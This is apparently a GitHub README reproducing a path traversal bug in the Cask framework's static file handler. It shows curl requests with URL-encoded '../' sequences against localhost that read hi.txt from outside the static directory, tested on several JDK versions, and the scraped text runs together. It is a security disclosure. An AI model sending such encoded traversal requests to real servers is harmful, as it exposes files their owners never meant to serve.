sbt runcurl http://localhost:8080/static/%2E%2E%2Fhi.txt- Outputs
Got me…fromhi.txtinstead ofHi!fromstatic/hi.txt curl http://localhost:8080/static/..%2F/hi.txtworks as well
- Outputs
- Tested on: HotSpot 17+35-LTS-2724, OpenJDK 11.0.25, OpenJDK 21.0.5
Maeeen/cask-static-path-traversal-issue
Folders and files
| Name | Name | Last commit date | ||
|---|---|---|---|---|